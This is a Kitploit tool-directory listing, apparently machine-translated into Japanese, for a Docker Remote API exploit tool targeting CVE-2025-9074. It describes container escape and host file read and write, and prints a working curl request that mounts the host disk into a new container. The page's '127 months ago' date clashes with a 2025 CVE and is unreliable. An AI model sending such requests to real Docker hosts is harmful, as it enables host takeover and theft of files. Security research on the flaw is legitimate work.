Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-9074-Docker-Exploit — CVE-2025-9074 の脆弱性のセキュリティ研究とテストのための、強力な Docker リモート API エクスプロイトツール。 | Kitploit
ツール/GitHubGitHub/shaoshi17/cve-2025-9074-docker-exploit
コンテナセキュリティ脆弱性分析エクスプロイトペネトレーションテストクラウドセキュリティレッドチーミングコンテナエスケープ
GitHubshaoshi17/cve-2025-9074-docker-exploit

CVE-2025-9074-Docker-Exploit

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-9074 の脆弱性のセキュリティ研究とテストのための、強力な Docker リモート API エクスプロイトツール。

リポジトリを見る
127ヶ月前未レビュー

CVE-2025-9074 Docker コンテナコマンド実行ツール

CVE-2025-9074 の脆弱性のセキュリティ研究とテストのための、強力な Docker リモート API エクスプロイトツールです。

主な利点

✅ 完全自動のコンテナライフサイクル管理: 一時コンテナを自動作成し、操作完了後に自動クリーンアップして痕跡を残しません
✅ インテリジェントなパス処理: Windows パスを自動的に認識して Docker マウント形式に変換します
✅ 完全自動化された操作フロー: 複雑なコマンドの手動入力は不要で、メニュー形式の対話によりワンクリックでファイル操作を完了します
✅ クロスプラットフォーム互換: Windows および Linux システムを完全にサポートします

一部機能のスクリーンショット

image

機能一覧

  • コンテナ操作

    • 実行中のコンテナを表示
    • すべてのコンテナを表示(停止中を含む)
    • 新しいコンテナを作成
    • コンテナを停止
    • コンテナを削除
    • 単一コマンドの実行
    • 対話型ターミナル(docker ライブラリが必要)
  • イメージ管理

    • ローカルイメージを表示
    • 新しいイメージをプル
    • イメージを削除
  • ホストファイル操作

    • ホストにファイルをアップロード
    • ホストからファイルをダウンロード
    • ホストのファイル内容を読み取り
    • ホストにファイルを書き込み
    • Windows Docker Desktop のパスマッピングを自動処理

脆弱性の説明

CVE-2025-9074 は Docker リモート API のセキュリティ脆弱性であり、攻撃者は Docker API への未承認アクセスにより以下を行うことができます:

  • 任意のコマンドを実行
  • コンテナを作成してホストのディスクをマウント
  • コンテナエスケープを実行
  • ホストファイルの読み取り/書き込み

環境要件

  • Python 3.6+

依存関係のインストール

requirements.txt を使用してすべての依存関係をインストールします:

root@kitploit:~
pip install -r requirements.txt

または手動でインストール:

root@kitploit:~
pip install requests docker websocket-client

使用方法

基本的な使い方

スクリプトを直接実行し、デフォルトの Docker API アドレスを使用します:

root@kitploit:~
python CVE-2025-9074-docker-exploit.py

Docker API アドレスのカスタマイズ

root@kitploit:~
python CVE-2025-9074-docker-exploit.py -u http://192.168.1.100:2375

コマンドライン引数

root@kitploit:~
python CVE-2025-9074-docker-exploit.py [选项]

选项:
  -u, --url URL         Docker API 地址(默认: http://192.168.65.7:2375)

機能の詳細

コンテナ操作

  1. 実行中のコンテナを表示: 実行中のすべてのコンテナのリストを表示します
  2. すべてのコンテナを表示: すべてのコンテナ(停止中を含む)を表示します
  3. 新しいコンテナを作成: 指定したイメージを使用して新しいコンテナを作成します
  4. コンテナを停止: 実行中のコンテナを停止します
  5. コンテナを削除: コンテナを削除します(強制削除可能)
  6. 単一コマンドの実行: コンテナ内で単一のコマンドを実行します
  7. 対話型ターミナル: コンテナの対話型シェルに入ります(docker ライブラリが必要)

対話型ターミナルの使用方法

  1. スクリプト実行後、「1. コンテナ操作」を選択します
  2. 「1. 実行中のコンテナを表示」を選択します
  3. コンテナの番号を入力してコンテナを選択します
  4. 「2. 対話型ターミナル (docker ライブラリが必要)」を選択します
  5. シェルコマンドを入力します(デフォルト: /bin/sh)
  6. 対話操作を開始します

イメージ管理

  1. イメージを表示: ローカルのすべてのイメージを一覧表示します
  2. イメージをプル: Docker Hub から新しいイメージをプルします
  3. イメージを削除: ローカルイメージを削除します

ホストファイル操作

ホストへのファイルのアップロード

root@kitploit:~
1. 上传文件到宿主机
请输入本地文件路径: /path/to/local/file.txt
请输入宿主机目标目录: D:/temp
请输入目标文件名 (留空则使用原文件名): 

ホストからのファイルのダウンロード

root@kitploit:~
2. 从宿主机下载文件
请输入宿主机文件路径: D:/temp/file.txt
请输入本地保存路径: /tmp

ホストのファイル内容の読み取り

root@kitploit:~
3. 读取宿主机文件内容
请输入宿主机文件路径: D:/temp/file.txt

ホストへのファイルの書き込み

root@kitploit:~
4. 向宿主机写入文件
请输入宿主机目标目录: D:/temp
请输入文件内容: Hello, World!

Windows Docker Desktop のパスマッピング

本ツールは Windows Docker Desktop のパスマッピングを自動処理します:

Windows パスDocker マウントパス

対応する入力形式:

  • D:\ または D:/
  • D:\temp または D:/temp
  • "D:\file.txt"(引用符付き)
  • 'D:/file.txt'(引用符付き)

セキュリティ上の注意事項

⚠️ 重要な注意事項:

  1. 認可されたテスト専用: 本ツールは認可を受けたセキュリティテストおよび教育目的にのみ使用してください
  2. 法的コンプライアンス: 使用前にターゲットシステムの明確な認可を取得してください
  3. 隔離環境: 隔離されたテスト環境での使用を推奨します
  4. 権限の制限: Windows Docker Desktop で C ドライブに書き込むには、管理者として実行する必要があります
  5. 濫用の禁止: 未承認で本ツールを使用すると、法律や規制に違反する可能性があります

動作原理

コンテナエスケープ

Docker API を介してコンテナを作成し、ホストのディスクをマウントします:

root@kitploit:~
curl -X POST "http://<target>:2375/containers/create" \
  -H "Content-Type: application/json" \
  -d '{
    "Image": "python:3.11.7",
    "Cmd": ["sleep", "999d"],
    "HostConfig": {
      "Binds": ["/mnt/host/d:/tmp"]
    },
    "Tty": true
  }'

ファイルの読み書き

コンテナ内でコマンドを実行することで、ホストのファイルを読み書きします:

root@kitploit:~
# 写入文件
echo "content" > /tmp/file.txt

# 读取文件
cat /tmp/file.txt

トラブルシューティング

コンテナ作成の失敗(500 エラー)

  • Docker API にアクセスできるか確認します
  • パス形式が正しいか確認します
  • イメージが存在するか確認します

ファイル書き込みの失敗

  • Windows Docker Desktop は管理者として実行する必要があります
  • ターゲットディレクトリの権限設定を確認します

対話型ターミナルが起動しない

  • docker ライブラリがインストールされていることを確認します:pip install docker websocket-client
  • ターミナルが対話モードをサポートしているか確認します

開発とテスト

テストの実行

root@kitploit:~
python CVE-2025-9074-docker-exploit.py

コード構造

root@kitploit:~
CVE-2025-9074-docker-exploit.py
├── 容器管理函数
│   ├── get_containers()
│   ├── display_containers()
│   ├── create_container()
│   ├── stop_container()
│   └── delete_container()
├── 镜像管理函数
│   ├── get_images()
│   ├── display_images()
│   ├── pull_image()
│   └── remove_image()
├── 宿主机文件操作函数
│   ├── upload_file_to_host()
│   ├── download_file_from_host()
│   ├── read_file_from_host()
│   └── write_file_to_host()
└── 工具函数
    ├── normalize_host_path()
    ├── create_container_with_mount()
    ├── start_container()
    └── stop_and_remove_container()

コントリビューション

Issue と Pull Request をお待ちしています!

ライセンス

このプロジェクトは教育およびセキュリティ研究のみを目的としています。

免責事項

本ツールは認可されたセキュリティテストおよび教育目的にのみ使用されます。使用者は本ツールの使用に伴うすべての責任とリスクを自ら負担するものとします。著者は、本ツールの濫用または未承認の使用に対して一切の責任を負いません。

参考資料

  • CVE-2025-9074 の脆弱性の詳細
  • Docker Remote API ドキュメント
  • Windows Docker Desktop のパスマッピングルール
ツールをダウンロード
D:\/mnt/host/d
D:\temp/mnt/host/d/temp
C:\Windows/mnt/host/c/Windows
C:\Users\test/mnt/host/c/Users/test